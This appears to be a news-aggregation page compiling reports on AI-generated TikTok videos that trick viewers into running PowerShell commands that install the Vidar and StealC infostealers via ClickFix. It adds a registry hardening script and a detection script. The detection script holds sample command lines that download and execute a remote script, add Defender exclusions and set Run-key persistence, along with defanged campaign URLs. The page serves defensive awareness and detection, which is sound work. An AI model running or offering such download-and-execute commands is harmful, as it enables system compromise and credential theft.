5 Sources
[1]
Warning: AI-Generated TikTok Videos Want to Trick You Into Installing Malware
Cybercriminals are using AI to create fake tutorials on TikTok that trick you into downloading information-stealing malware onto your PC, according to cybersecurity firm Trend Micro.

The campaign is built around the virality of TikTok videos that promise free access to popular software. Examples include videos demonstrating free ways to install Windows and Microsoft Office or to access premium versions of apps like Spotify and CapCut. In the videos, scammers provide step-by-step instructions to run a PowerShell script, delivered by voiceover or displayed on the screen.

"There is no malicious code present on the platform [TikTok] for security solutions to analyze or block," Trend Micro says. These scripts might appear legitimate at first, but they are "designed to socially engineer viewers into running a PowerShell command that downloads and executes a remote script, ultimately compromising their system," the researchers add.

Directories created during the process are then added to the Windows Defender exclusion list to avoid detection. The script also downloads a secondary payload that deploys Vidar or StealC malware, which can be used to steal your login credentials, credit card data, 2FA codes, and more.

For threat actors, TikTok's algorithm helps scale the attack quickly. One such deceptive video, captioned "Boost your Spotify Experience instantly," has garnered nearly 500,000 views. The use of AI-generated content also amplifies these attacks, as "videos can be rapidly produced and tailored to target different user segments," the researchers say.

To avoid falling for these traps, Trend Micro encourages users to approach unsolicited technical instructions with caution, verify the legitimacy of video sources, and report suspicious posts on social media, messaging apps, or email. Additionally, it's best to avoid running PowerShell commands you don't fully understand or that don't come from a trusted source. You should also avoid direct downloads from unknown URLs.
[2]
TikTok videos now push infostealer malware in ClickFix attacks
Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.

As Trend Micro recently discovered, the threat actors behind this TikTok social engineering campaign are using videos likely generated with AI that ask viewers to run commands claiming to activate Windows and Microsoft Office, as well as premium features in various legitimate software like CapCut and Spotify.

"This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said.

"The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," it added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos."

One of the videos, claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views, with over 20,000 likes and more than 100 comments. In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions.

After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases. StealC can also harvest a wide range of sensitive information from infected computers, as it targets dozens of web browsers and cryptocurrency wallets.

After the device is compromised, the script will download a second PowerShell script payload from hxxps://amssh[.]co/script[.]ps1 that adds a registry key so the malware launches automatically at startup.

ClickFix is a tactic where attackers employ fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running malicious scripts that download and install malware on their devices. While generally targeting Windows users through PowerShell commands, ClickFix has also been adopted in attacks against macOS and Linux users. State-sponsored threat groups have also hacked their targets in similar attacks, with APT28 and ColdRiver (Russia), Kimsuky (North Korea), and MuddyWater (Iran) all having used these tactics in espionage campaigns in recent months.

This is not the first time TikTok videos have been used to push malware: cybercriminals previously capitalized on a trending TikTok challenge named 'Invisible Challenge' to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. The malware was pushed through videos that received over a million views shortly after being posted and can steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also been flooding TikTok with fake cryptocurrency giveaways, almost all using Elon Musk, Tesla, or SpaceX themes.
[3]
Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique
The malware known as Latrodectus has become the latest to embrace the widely used social engineering technique called ClickFix as a distribution vector.

"The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security tools to detect or block the malware."

Latrodectus, believed to be a successor to IcedID, is the name given to a malware that acts as a downloader for other payloads, such as ransomware. It was first documented by Proofpoint and Team Cymru in April 2024. Incidentally, the malware is one of the many malware families to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Latrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025.

In the latest set of Latrodectus attacks observed by Expel in May 2025, unsuspecting users are tricked into copying and executing a PowerShell command from an infected website, a tactic that has become a prevalent method of distributing a wide range of malware.

"When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said. "This keeps the attacker from having to write the file to the computer and risk being detected by the browser or an antivirus that might detect it on disk."

The MSI installer contains a legitimate application from NVIDIA, which is used to sideload a malicious DLL, which then uses curl to download the main payload. To mitigate attacks of this type, it's advised to disable the Windows Run program using Group Policy Objects (GPOs) or to turn off the "Windows + R" hot key via a Windows Registry change.
From ClickFix to TikTok

The disclosure comes as Trend Micro revealed details of a new social engineering campaign that, instead of relying on fake CAPTCHA pages, employs TikTok videos likely generated using artificial intelligence (AI) tools to deliver the Vidar and StealC information stealers by instructing users to run malicious commands on their systems to activate Windows, Microsoft Office, CapCut, and Spotify.

These videos have been posted from various TikTok accounts such as @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the videos, claiming to provide instructions on how to "boost your Spotify experience instantly," has amassed nearly 500,000 views, with over 20,000 likes and more than 100 comments.

The campaign marks a new escalation of ClickFix in that users searching for ways to activate pirated apps are verbally and visually guided to open the Windows Run dialog by pressing the "Windows + R" hot key, launch PowerShell, and run the command highlighted in the video, ultimately compromising their own systems.

"Threat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially engineer users into executing PowerShell commands under the guise of guiding them to activate legitimate software or unlock premium features," security researcher Junestherry Dela Cruz said. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware."

Fake Ledger Apps Used to Steal Mac Users' Seed Phrases

The findings also follow the discovery of four different malware campaigns that leverage a cloned version of the Ledger Live app to steal sensitive data, including seed phrases, with the goal of draining victims' cryptocurrency wallets. The activity has been ongoing since August 2024.

The attacks make use of malicious DMG files that, when launched, run AppleScript to exfiltrate passwords and Apple Notes data, and then download a trojanized version of Ledger Live. Once the app is opened, it warns users of a supposed account problem and claims it requires their seed phrase for recovery. The entered seed phrase is sent to an attacker-controlled server.

Moonlock Lab, which shed light on the campaign, said the rogue apps make use of macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey, the latter of which introduced the novel phishing scheme in March 2025. It's worth noting that the activity overlaps with a macOS infostealer campaign that targets Ledger Live users through PyInstaller-packed binaries, as revealed by Jamf this month.

"On dark web forums, chatter around anti-Ledger schemes is growing. The next wave is already taking shape," MacPaw's cybersecurity division noted. "Hackers will continue to exploit the trust crypto owners place in Ledger Live."
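The Run-dialog mitigation attributed to Expel in the article above (disable the Run program via policy, or turn off the Windows + R hot key via the registry) can be applied per user with the script below. This is an added example, not code from Expel, Trend Micro, or any of the cited articles; it assumes it runs in the context of the user being hardened and that the user logs off (or Explorer is restarted) afterwards for the values to take effect.

```powershell
# Added example: apply the two Run-dialog mitigations named in the Expel report per user.
# Assumes it runs as the user being hardened; a domain would normally push the same
# values through GPO (User Configuration > Administrative Templates > Start Menu and
# Taskbar > "Remove Run menu from Start Menu") instead of writing HKCU directly.

$PolicyKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$AdvancedKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'

function Set-RunDialogMitigation {
    param([switch]$Undo)

    foreach ($key in $PolicyKey, $AdvancedKey) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    }

    if ($Undo) {
        Remove-ItemProperty -Path $PolicyKey   -Name 'NoRun'           -ErrorAction SilentlyContinue
        Remove-ItemProperty -Path $AdvancedKey -Name 'DisabledHotkeys' -ErrorAction SilentlyContinue
        return
    }

    # NoRun = 1 is the registry form of the "Remove Run menu from Start Menu" policy:
    # the Run dialog is blocked, which removes the first step shown in the videos.
    New-ItemProperty -Path $PolicyKey -Name 'NoRun' -PropertyType DWord -Value 1 -Force | Out-Null

    # DisabledHotkeys lists Windows-key letter combinations to disable; "R" turns off
    # Windows+R. This is the hot-key registry change the article refers to.
    New-ItemProperty -Path $AdvancedKey -Name 'DisabledHotkeys' -PropertyType String -Value 'R' -Force | Out-Null
}

function Get-RunDialogMitigation {
    # Report the current state so a compliance check can confirm both values are set.
    $noRun = (Get-ItemProperty -Path $PolicyKey   -Name 'NoRun'           -ErrorAction SilentlyContinue).NoRun
    $keys  = (Get-ItemProperty -Path $AdvancedKey -Name 'DisabledHotkeys' -ErrorAction SilentlyContinue).DisabledHotkeys
    [pscustomobject]@{
        RunDialogBlocked   = ($noRun -eq 1)
        WinRHotkeyDisabled = ($null -ne $keys -and $keys.ToUpper().Contains('R'))
    }
}

Set-RunDialogMitigation
Get-RunDialogMitigation
# Explorer reads both values at logon: log off and back on, or restart explorer.exe, to apply.
```

Blocking the Run dialog removes the exact step demonstrated in the videos but does not stop a user from starting PowerShell from the Start menu search box, so treat it as one layer alongside PowerShell script-block logging and monitoring of Defender exclusion changes.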
[4]
TikTok fans beware - experts warn dangerous malware spread by AI fake videos
The clips were AI-generated and trick the victims into downloading infostealers

Hackers are posting AI-generated videos on TikTok to trick users into downloading infostealing malware, cybersecurity researchers at Trend Micro have warned.

The premise is simple: the attackers use AI to generate numerous videos demonstrating how to easily "activate" Windows and Microsoft Office, or enable "premium features" in apps such as Spotify or CapCut. They then share these videos on TikTok, whose algorithm makes it more likely for the video to go viral, making the success of the attack more likely.

In the clip, a person is shown bringing up the Run program on Windows and then executing a PowerShell command. While in the video the command results in the activation of special features, in reality users running the command would download a malicious script which, in turn, deploys the Vidar and StealC infostealers. These infostealers can take screenshots, steal login credentials, grab credit card data, and exfiltrate cookies, cryptocurrency wallet information, 2FA codes, and more.

"This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said.

"The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," the researchers added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos."

One of the videos has roughly 500,000 views, more than 20,000 likes, and more than 100 comments, making it quite successful.

Videos have been used to deliver malware in the past, too, but this new campaign is a significant departure from earlier methods. The difference is that before, the link to the malware was shared in the video's description or comments, where it could still be picked up by security solutions. By delivering the bait in a video format, the attackers successfully bypass almost all security measures.
[5]
These AI-Generated TikTok Videos Are Tricking People Into Installing Malware
In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks.

The scheme, identified by Trend Micro and reported by BleepingComputer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned "Boost Your Spotify Experience Instantly -- Here's How!" and has nearly half a million views. These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware. TikTok's engagement algorithm makes it easy for such malicious videos to spread.

In the past, cybercriminals have used TikTok's trending "Invisible Challenge" to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying "activation" deposits in Bitcoin.

ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command containing malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to "fix" the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too.

In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest data ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets.

Once run, the script downloads a second PowerShell script that allows it to launch automatically on device startup. It also saves itself in a hidden directory and deletes temporary folders so it can evade detection.

Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with content that is legitimate, such as content from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly.

There's no malicious code actually embedded in or delivered by these instructional videos -- the scheme depends on social engineering via verbal directions -- making the threat technically harder to detect.
Cybercriminals are using AI-generated TikTok videos to trick users into installing information-stealing malware through fake software activation tutorials.
In a concerning development for social media users, cybersecurity researchers have uncovered a sophisticated malware distribution campaign leveraging AI-generated TikTok videos. This new attack vector, known as ClickFix, exploits the platform's viral nature to spread information-stealing malware through deceptive tutorials [1].
Source: PC Magazine
The campaign centers around seemingly helpful videos that promise free access to popular software or premium features. These AI-generated tutorials, which appear legitimate at first glance, instruct viewers to execute PowerShell commands under the guise of activating Windows, Microsoft Office, or unlocking premium features in apps like Spotify and CapCut [2].
However, the commands actually download and execute remote scripts that compromise the user's system. One such video, promising to "boost your Spotify experience instantly," garnered nearly 500,000 views, demonstrating the potential reach of this attack method [3].
The primary payloads delivered through this campaign are the Vidar and StealC information-stealing malware. These sophisticated tools can take desktop screenshots and steal login credentials, cookies, credit card data, cryptocurrency wallet information, text files, and 2FA authenticator databases [2], [4].
What makes this attack particularly insidious is its ability to evade traditional security measures. The malicious code is not present on the TikTok platform itself, making it challenging for security solutions to analyze or block. Instead, the attack relies on social engineering to trick users into running the malicious commands themselves [5].
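Because nothing malicious ever reaches the platform, detection has to happen on the endpoint, where the chain described in the sources above is visible as process-creation events: a hidden PowerShell started from the Run dialog (parent explorer.exe) that fetches and executes a remote script, followed by a Defender exclusion and a Run-key persistence entry. The triage function below is an added example, not code from Trend Micro or any cited article; it runs over constructed sample records in a simple key=value format (the field names Parent, Image and Cmd are assumptions), and the URL and paths in the samples are placeholders, not indicators from the campaign.

```powershell
# Added example: flag process-creation records that match the ClickFix chain on this page.
# The records are constructed sample data in an assumed Parent/Image/Cmd format, not real
# telemetry; map the fields to Sysmon Event ID 1 or Security Event ID 4688 in practice.
$records = @(
    'Parent=C:\Windows\explorer.exe;Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;Cmd=powershell -w hidden -c "iex (irm https://example.invalid/spotify)"',
    'Parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;Cmd=powershell Add-MpPreference -ExclusionPath C:\Users\u\AppData\Local\Example',
    'Parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;Image=C:\Windows\System32\reg.exe;Cmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\u\AppData\Local\Example\run.ps1',
    'Parent=C:\Windows\explorer.exe;Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;Cmd=powershell Get-Process'
)

function ConvertFrom-Record([string]$Line) {
    # Split into at most three fields so a ';' inside the command line is not lost.
    $h = @{}
    foreach ($pair in $Line -split ';', 3) {
        $k, $v = $pair -split '=', 2
        $h[$k] = $v
    }
    [pscustomobject]$h
}

function Get-ClickFixIndicators($r) {
    $hits = @()
    $isPs = $r.Image -match 'powershell\.exe$|pwsh\.exe$'

    # Stage 1 (page: Win+R -> PowerShell, launched as a hidden process): a hidden-window
    # PowerShell whose parent is explorer.exe is how a Run-dialog launch shows up in telemetry.
    if ($isPs -and $r.Parent -match 'explorer\.exe$' -and $r.Cmd -match '-w(indowstyle)?\s+h(idden)?') {
        $hits += 'HiddenPowerShellFromExplorer'
    }
    # Stage 1 (page: command downloads and executes a remote script).
    if ($r.Cmd -match '(iex|Invoke-Expression).*?(irm|Invoke-RestMethod|iwr|Invoke-WebRequest|DownloadString)') {
        $hits += 'RemoteScriptDownloadAndExecute'
    }
    # Stage 2 (page: payload directories added to the Windows Defender exclusion list).
    if ($r.Cmd -match 'Add-MpPreference.*-Exclusion') { $hits += 'DefenderExclusionAdded' }
    # Stage 3 (page: second script adds a registry key to launch at startup).
    if ($r.Cmd -match 'CurrentVersion\\Run\b' -and $r.Cmd -match '^(reg\s+add|.*Set-ItemProperty|.*New-ItemProperty)') {
        $hits += 'RunKeyPersistence'
    }
    $hits
}

function Invoke-ClickFixTriage([string[]]$Lines) {
    foreach ($line in $Lines) {
        $r   = ConvertFrom-Record $line
        $ind = @(Get-ClickFixIndicators $r)
        if ($ind.Count -gt 0) {
            [pscustomobject]@{
                Image      = Split-Path $r.Image -Leaf
                Indicators = ($ind -join ',')
                Cmd        = $r.Cmd
            }
        }
    }
}

# Three of the four constructed records are flagged; the plain "Get-Process" launch is not.
Invoke-ClickFixTriage $records | Format-Table -AutoSize -Wrap
```

Correlating the three stages on one host within a short window is a stronger signal than any single match, since administrators also add Defender exclusions and Run keys legitimately.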
Source: The Hacker News
The use of AI-generated content in this campaign marks a significant escalation in the sophistication of social media-based attacks. AI allows for the rapid production of tailored videos targeting different user segments, potentially increasing the reach and effectiveness of such campaigns [1].
This campaign is part of a larger trend of malware distribution through social media platforms. Previous incidents have included the trending "Invisible Challenge", which was used to spread WASP Stealer malware capable of stealing Discord accounts, passwords, credit cards, and cryptocurrency wallets, and fake cryptocurrency giveaways that used deepfakes of Elon Musk alongside Tesla and SpaceX themes [2], [5].
Source: TechRadar
To mitigate the risk of falling victim to these attacks, experts recommend approaching unsolicited technical instructions with caution, verifying the legitimacy of video sources, reporting suspicious posts, not running PowerShell commands you don't fully understand or that don't come from a trusted source, and avoiding direct downloads from unknown URLs [1].
As social media platforms continue to evolve, users must remain vigilant against increasingly sophisticated cyber threats that exploit the viral nature of content and the trust placed in seemingly helpful tutorials.